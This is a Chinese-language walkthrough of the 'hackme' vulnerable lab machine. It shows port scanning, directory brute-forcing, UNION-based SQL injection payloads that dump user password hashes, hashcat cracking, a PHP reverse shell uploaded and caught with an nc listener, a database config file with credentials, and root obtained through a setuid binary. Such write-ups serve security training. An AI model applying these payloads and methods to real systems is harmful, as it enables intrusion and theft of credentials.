hackme 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.143 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 17:01 EDT
Nmap scan report for 192.1.1.143
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:4F:34:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

开放了 22 和 80 端口

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.1.1.143                                   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 17:03 EDT
Nmap scan report for 192.1.1.143
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:4F:34:38 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds

Ubuntu 操作系统，以防万一看看 UDP 端口扫描

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.143   
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 19:00 EDT
Nmap scan report for 192.1.1.143
Host is up (0.00038s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:4F:34:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds

Web 渗透

访问 80 端口，自动跳转到登录界面，同时进行目录爆破

感觉有点简陋，在这个界面试一试 SQL 注入（万能密码），但是失败了。

看到可以注册，尝试注册后登录

注册后登录成功，来到了 welcome.php

目录爆破也出了结果

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo gobuster dir -u http://192.1.1.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php 
[sudo] password for kali: 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.143
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/08/15 18:59:40 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 100]
/.php                 (Status: 403) [Size: 290]
/login.php            (Status: 200) [Size: 1245]
/register.php         (Status: 200) [Size: 1937]
/uploads              (Status: 301) [Size: 312] [--> http://192.1.1.143/uploads/]
/welcome.php          (Status: 302) [Size: 0] [--> login.php]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 290]
/server-status        (Status: 403) [Size: 299]
Progress: 436644 / 441122 (98.98%)
===============================================================
2023/08/15 19:00:25 Finished
===============================================================

看来下 uploads 目录，没有上传文件的路口。

SQL 注入

继续看看刚才界面的搜索框，使用 burp suite 抓包后使用 fuzz 字典进行爆破

看到似乎是有注入点的，开始手动注入

构造

{base}' or 1=1 #

可以看到这时候显示了所有的信息

{base}' or 1=1 order by 3 #

{base}' or 1=1 order by 4 #

当 order by 4 的时候无回显，order by 3 的时候显示全部信息

构造

{base}' and 1=2 union select 1,2,3 #

发现 1,2,3 都是回显位

接下来继续经典操作，MySQL 注入

{base}' and 1=2 union select group_concat(table_name),2,3 from information_schema.tables where table_schema = 'webapphacking' #

{base}' and 1=2 union select group_concat(column_name),2,3 from information_schema.columns where table_name = 'users' #

{base}' and 1=2 union select group_concat(id,0x2d,user,0x2d,pasword,0x2d,name,0x2d,address),2,3 from users #

将结果拿出来，稍微规整一下，写入到 result 文件中，记得去除掉我们注册的 jack 用户

1-user1-5d41402abc4b2a76b9719d911017c592-David-Newton Circles,
2-user2-6269c4f71a55b24bad0f0267d9be5508-Beckham-Kensington,
3-user3-0f359740bd1cda994f8b55330c86d845-anonymous-anonymous,10-test-05a671c66aefea124cc08b76ea6d30bb-testismyname-testaddress,
11-superadmin-2386acb2cf356944177746fc92523983-superadmin-superadmin,
12-test1-05a671c66aefea124cc08b76ea6d30bb-test1-test1,
13-jack-e10adc3949ba59abbe56e057f20f883e-jack-jack

密码哈希碰撞

到了最喜欢的使用 awk 的环节

awk -F '-' '{print $3}' result > passwdhash

接下来用 hashcat

hashcat -m 0 -a 0 userpasswdhash --show rockyou.txt
5d41402abc4b2a76b9719d911017c592:hello
6269c4f71a55b24bad0f0267d9be5508:commando
0f359740bd1cda994f8b55330c86d845:p@ssw0rd
05a671c66aefea124cc08b76ea6d30bb:testtest

不得不说 hashcat 是真的快，不过有个似乎有个密码没被碰撞出来，看一眼竟然是 superadmin 没被爆破出来，那只能试试在线网站试试运气了

完美，现在拿到了一堆密码和用户名，可以尝试进行 ssh 爆破

不过既然是网站的用户名和密码，我们可以在爆破的同时去网站登陆一下 superadmin 用户

竟然可以上传文件，结合目录爆破中有个 upload 目录，那么我们可以猜测攻击路径或许是先上传反弹 shell 的文件，再从浏览器中访问进而 getshell

Getshell

直接传个经典 php 的 webshell，记得修改 IP 和端口，然后提前开启监听，尝试不改后缀直接上传。

竟然没有过滤，直接上传成功了。尝试访问：

http://192.1.1.143/uploads/php-reverse-shell.php

反弹成功

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nc -lvnp 1234                      
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.143] 42294
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 23:04:21 up  2:04,  0 users,  load average: 0.06, 0.46, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:4f:34:38 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.143/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1529sec preferred_lft 1529sec
    inet6 fe80::20c:29ff:fe4f:3438/64 scope link 
       valid_lft forever preferred_lft forever
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@hackme:/$ sudo -l
sudo -l
[sudo] password for www-data:

看一下 passwd 文件中有哪些用户，然后尝试能不能用刚才碰撞出的网站用户的密码来切换登录。网站是连接了数据库的，那么还需要去网站根目录找一下数据库配置文件

www-data@hackme:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'hackme1qaz@WSX');
define('DB_NAME', 'webapphacking');
 
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

提权

试了一遍都失败了，去用户根目录看看有没有什么敏感信息

www-data@hackme:/home/hackme$ ls -alih
ls -alih
total 48K
1316877 drwxr-xr-x 5 hackme hackme 4.0K Mar 25  2019 .
1310721 drwxr-xr-x 4 root   root   4.0K Mar 26  2019 ..
1316887 -rw------- 1 hackme hackme 5.7K Mar 27  2019 .bash_history
1316878 -rw-r--r-- 1 hackme hackme  220 Sep 12  2018 .bash_logout
1316879 -rw-r--r-- 1 hackme hackme 3.7K Sep 12  2018 .bashrc
1316881 drwx------ 2 hackme hackme 4.0K Mar 13  2019 .cache
1316883 drwx------ 3 hackme hackme 4.0K Mar 13  2019 .gnupg
1316888 drwxrwxr-x 3 hackme hackme 4.0K Mar 21  2019 .local
1316889 -rw------- 1 root   root   5.5K Mar 25  2019 .mysql_history
1316880 -rw-r--r-- 1 hackme hackme  807 Sep 12  2018 .profile
1316885 -rw-r--r-- 1 hackme hackme    0 Mar 13  2019 .sudo_as_admin_successful
www-data@hackme:/home/hackme$ cd ../legacy
cd ../legacy
www-data@hackme:/home/legacy$ ls -alih
ls -alih
total 20K
1316893 drwxr-xr-x 2 root root 4.0K Mar 26  2019 .
1310721 drwxr-xr-x 4 root root 4.0K Mar 26  2019 ..
1317196 -rwsr--r-x 1 root root 8.3K Mar 26  2019 touchmenot
www-data@hackme:/home/legacy$ strings touchmenot
strings touchmenot

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.

没法直接看，运行一下试试？

www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy#

竟然直接变成 root 了，有点抽象。